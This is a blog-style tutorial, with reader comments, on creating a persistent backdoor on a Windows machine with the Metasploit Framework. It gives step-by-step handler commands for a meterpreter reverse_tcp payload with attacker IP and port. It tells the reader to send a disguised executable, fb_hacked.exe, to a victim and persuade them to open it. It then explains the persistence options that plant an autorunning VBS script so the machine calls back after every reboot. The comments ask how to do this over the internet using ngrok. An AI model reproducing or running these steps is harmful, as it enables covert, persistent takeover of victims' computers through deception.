Hello guys in this tutorial I will show you to create a backdoor with Persistent using Metasploit Framework, before going to this tutorial let me explain little bit about Persistent. Actually Guys Metasploit contains two backdoors one is Persistent and the another is Metsvc. Here I am using Persistent to create a backdoor. Actually Persistent creates a backdoor which twice to connect back to the attacker metasploit instance and it would connect back to happen at system boot or user log on. You can also configure the time between different connect back attempt in case the currently the attacker machine is not up and you want the backdoor to keep trying to connect you. Now how its work, under the hood Persistent creates a vbs script on the victim system and it to appropriate registry to autorun. This is all about backdoor with Persistent now check out how it works…
Step 1 :- Here I am using backtrack5r3 which is a attacker System now we open a console and write the following codes to create a exploit here my exploit name is fb_hacked.exe.
Now the exploit is ready in the root directory which is successfully encoded.
Step 2 :- Now we try to enter into msfconsole console, for that
Open console and write msfconsole
Step 3 :- Then we set the Payload using the following commands
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
(here PAYLOAD mean the code or exploit which is actually runs on the victim machine after exploitation and windows the victim machine or meterpreter is used to open the meterpreter seesion of windows and reverse_tcp is use to connect back to attacker machine to victim machine)
set LHOST 192.168.124.130 (this is a backtrack ip address which is a attacker machine, you use ifconfig command to see the ip address of backtrack)
set LPORT 4444
exploit
Step 4 :- In above screen shot we run the exploit and wait for the victim click on exploit. Now we copy that exploit and send to the victim and request him/her to open that exploit.
Now when a victim click on fb_hacked exploit after that the exploit is run on the victim machine with full permission, here we successfully exploit the victim machine and we got the meterpreater session of victim machine is open.
Now its time to create a backdoor for that we going to run the Persistent using run command.
(here –A mean automatic start matching multi/handler to connect to the agent the second is –L where to write the Payload this where the vb script is located. Now it keep in c:\ drive . The –X mean the agent automatically starts when the system boot, -i 10 means the no. of second to wait between each connect attempted, -p 443 mean the port on which the metasploit will be listening and the ip on which the attacker machine is running which 192.168.124.130
Now keep the track of yellow mark file i.e /root/.msf4/logs/persistence/MUKESH-80BAA26A_20131020.5854/MUKESH-80BAA26A_20131020.5854.rc
Which is allow to uninstall or delete this backdoor at a later time.
Now we can noticed it just connected back to give a new meterpreater sessions. Now if i make these meterpreater session background using background and session command. Then here we actually found 2 or 3 meterpreater session currently waiting for us.
And here sessions 3 is the new one which is created by the persistent.
Background
sessions –i 3
Now if you want to see what really happened in the victim machine then you go to the c:\\ drive of victim machine. Then you actually noticed there is a visual basic script are generated, this is what content the persistent backdoor.
Now go to backtrack, let’s try and see what happened when a system reboots. Now reboot the victim system using reboot command, and lets see what happen and wait for to restart the victim system.
Here we see when the system is restart the pervious sessions is closed i.e session 3 and after restart the persistent backdoor connected back to us after the system reboot and open a new session i.e session 4. Now we have a new meterpreter session which is comfortably connect using session command
2 thoughts on “BACKDOOR WITH PERSISTENT USING METASPLOIT FRAMEWORK”
I want to know that if I perform this on wan using ngrok then in the persistent command I mean in the ruby script what details we will enter in lhost and lport 127.0.0.1 or our local ip address??
I want to know that if I perform this on wan using ngrok then in the persistent command I mean in the ruby script what details we will enter in lhost and lport 127.0.0.1 or our local ip address??
You need to put Your system’s IP address in 1host and 1Port would be 443.